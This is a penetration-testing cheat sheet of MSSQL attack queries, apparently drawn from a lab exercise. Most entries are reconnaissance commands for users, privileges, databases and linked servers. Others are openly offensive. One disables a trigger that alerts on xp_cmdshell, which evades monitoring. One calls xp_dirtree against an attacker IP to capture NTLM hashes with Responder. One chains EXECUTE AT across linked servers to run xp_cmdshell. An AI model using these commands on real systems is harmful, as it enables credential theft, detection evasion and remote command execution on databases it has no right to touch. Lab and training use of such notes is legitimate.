MSSQL


# to get version
select @@version;

# to get current server
select @@servername

#current user
select suser_name();

#To List Users
SELECT name FROM master..syslogins

#To List sysadmin privs for all users
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#List database
SELECT name FROM master..sysdatabases;

#to check or permission
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;

#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]

#to list triggers and disable trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server

#If xp_dirtree is enable, we try to catch NTLM hashes via responder
xp_dirtree \\10.10.16.7\test

  • Database Link

#List the database links
select * from master..sysservers

#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');

#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');

#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');

#List Databases
select * from openquery("WEB\CLIENTS", 'SELECT name FROM master..sysdatabases;');

#List tables
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT * FROM clients.information_schema.tables');

  • nested database links

#try to have POO_CONFIG run a command on POO_PUBLIC
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')

#To check for permission
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')

#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

  • Procdure

#List Procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, object_id FROM clients.sys.procedures');

#To check the permission on that Procedure (1 yes/ 0 no)
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT HAS_PERMS_BY_NAME(''clients.dbo.BackupClients'', ''OBJECT'', ''VIEW DEFINITION'') AS CanViewDefinition');

#To check the encryption of procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT OBJECT_NAME(object_id) AS ProcName, OBJECT_DEFINITION(object_id) AS Definition FROM clients.sys.procedures WHERE name = ''BackupClients''');

#to check for assembly files
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, assembly_id, clr_name, permission_set_desc, is_visible FROM clients.sys.assemblies');
PreviousCypher InjectionNextBackDrop CMS

Last updated